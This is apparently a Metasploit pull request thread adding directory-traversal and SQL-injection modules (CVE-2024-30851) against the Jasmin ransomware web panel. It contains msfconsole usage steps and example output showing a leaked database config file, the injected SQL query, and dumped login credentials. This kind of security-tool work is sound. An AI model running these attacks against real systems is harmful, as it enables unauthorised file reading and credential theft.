jasmin ransomware sqli and dir travers (CVE-2024-30851)

[h00die]

This PR adds an unauth dir traversal, and a sqli exploit (CVE-2024-30851) against the Jasmin ransomware web panel.

Verification

1. Install the application

2. Start msfconsole

3. Do: use auxiliary/gather/jasmin_ransomware_dir_traversal

4. Do: set rhosts [ip]

5. Do: run

6. You should get the content of a file if it exists.

7. Install the application

8. Start msfconsole

9. Do: use auxiliary/gather/jasmin_ransomware_sqli

10. Do: set rhosts [IP]

11. Do: run

12. You should contents from the SQL Database.

[h00die]

@chebuya wanted to bring this to your attention since you discovered it

[jheysel-r7]

Could this datastore option enable the module to grab multiple files at once?

[h00die]

as an OptString in theory if there was a , or other delimiter, however I don't think any dir travers modules within MSF do multiple files unless its a 'static' device (like a network appliance) where things are in a set location and certain files are known to be of strategic value

[cdelafuente-r7]

Thanks @h00die for these modules. I just left a few minor comments before it lands.

[h00die]

@cdelafuente-r7 this should be good now

[cdelafuente-r7]

Thanks for updating this @h00die ! Everything looks good to me now. I tested against the latest version available and verified both modules work as expected. I'll go ahead and land it.

• Example outputs:

msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > run verbose=true rhosts=192.168.101.229 rport=8080 file=/srv/www/jasmin/database/db_conection.php
[*] Running module against 192.168.101.229

[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Jasmin Login page detected
[+] <?php
$dbcon=mysqli_connect("localhost","jasminadmin","123456");

mysqli_select_db($dbcon,"jasmin_db");

?>

[+] Saved file to: /home/msfuser/.msf4/loot/20240527111824_default_192.168.101.229_jasmin.webpanel._144889.txt
[*] Auxiliary module execution completed

msf6 auxiliary(gather/jasmin_ransomware_sqli) > run verbose=true rhosts=192.168.101.229 rport=8080
[*] Running module against 192.168.101.229

[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Jasmin Login page detected
[*] Dumping login table
[*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(admin,''),ifnull(creds,'')) as binary)) from master)
[*] {SQLi} Time-based injection: expecting output of length 15
[!] No active DB -- Credential data will not be saved!
[+] Dumped table contents:
Logins
======

 admin     creds
 -----     -----
 siddhant  123456

[*] Auxiliary module execution completed

[cdelafuente-r7]

Release Notes

This adds an unauthenticated directory traversal and a SQLi exploit against the Jasmin ransomware web panel.